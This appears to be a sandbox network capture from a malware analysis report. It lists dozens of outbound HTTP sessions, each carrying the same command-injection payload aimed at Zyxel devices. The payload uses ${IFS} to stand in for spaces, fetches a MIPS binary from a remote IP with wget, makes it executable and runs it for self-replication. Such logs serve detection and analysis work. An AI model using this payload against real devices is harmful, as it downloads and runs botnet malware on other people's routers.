                                                Jan 12, 2024 18:24:47.145932913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7372192.168.2.135188261.206.103.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146019936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7373192.168.2.133968841.208.218.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146089077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7374192.168.2.1341852166.68.220.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146127939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7375192.168.2.135461072.97.64.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146190882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7376192.168.2.1339000192.2.80.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146222115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7377192.168.2.1344518176.103.135.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146302938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7378192.168.2.1332986149.62.74.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146331072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7379192.168.2.1338946213.93.197.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146370888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7380192.168.2.134916678.233.188.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146416903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7381192.168.2.1345856173.178.159.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146456003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7382192.168.2.13331781.165.68.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146505117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7383192.168.2.1352588178.177.87.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146573067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7384192.168.2.1347598100.192.164.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146616936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7385192.168.2.1347930134.207.54.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146651030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7386192.168.2.135564674.217.247.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146729946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7387192.168.2.1344036186.224.230.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146768093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7388192.168.2.1336668185.180.55.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146822929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7389192.168.2.1339656129.236.171.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146878958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7390192.168.2.1358890125.88.129.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146933079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7391192.168.2.1353162129.157.49.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.146992922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7392192.168.2.134651232.131.64.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147057056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7393192.168.2.1351934219.30.233.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147105932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7394192.168.2.1332784133.186.17.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147181988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7395192.168.2.1353512197.199.174.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147202969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7396192.168.2.134318282.22.93.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147264957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7397192.168.2.1347870144.158.88.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147293091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7398192.168.2.135395871.247.44.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147349119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7399192.168.2.1346382108.39.120.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147398949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7400192.168.2.1345424179.119.217.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147444010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7401192.168.2.135578258.217.164.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147494078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7402192.168.2.1336450202.182.207.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147561073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7403192.168.2.134332895.150.244.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147618055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7404192.168.2.1346226116.251.166.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147655964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7405192.168.2.135418641.193.146.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147708893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7406192.168.2.1344248151.186.96.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147775888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7407192.168.2.1357528205.226.139.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147831917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7408192.168.2.135330425.51.242.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.147882938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7409192.168.2.133298672.166.24.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146136999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7410192.168.2.1356894148.203.132.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146202087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7411192.168.2.1358680174.174.35.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146279097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7412192.168.2.1338050114.113.110.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146312952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7413192.168.2.133298832.22.38.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146356106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7414192.168.2.134803473.207.115.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146384954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7415192.168.2.1336350217.171.61.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146425009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7416192.168.2.1347850100.226.220.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146455050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7417192.168.2.135387865.167.154.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146482944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7418192.168.2.1354168160.185.193.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146538973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7419192.168.2.1342662172.149.39.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146559954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7420192.168.2.1340270187.181.49.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146599054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7421192.168.2.134756854.12.213.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146632910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7422192.168.2.1355376222.131.6.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146673918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7423192.168.2.135163274.241.95.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146714926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7424192.168.2.1339712216.197.93.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146756887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7425192.168.2.1345678164.248.75.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146800041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7426192.168.2.134681843.117.94.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146830082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7427192.168.2.135911432.4.25.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146856070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7428192.168.2.1350862223.194.29.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146914959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7429192.168.2.1346680111.248.241.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.146953106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7430192.168.2.1354728162.100.97.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147011042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7431192.168.2.134193636.165.1.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147026062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7432192.168.2.1340162134.205.144.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147068024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7433192.168.2.1358208164.61.60.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147135019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7434192.168.2.1352236200.132.208.251443
                                                TimestampBytes transferredDirectionData
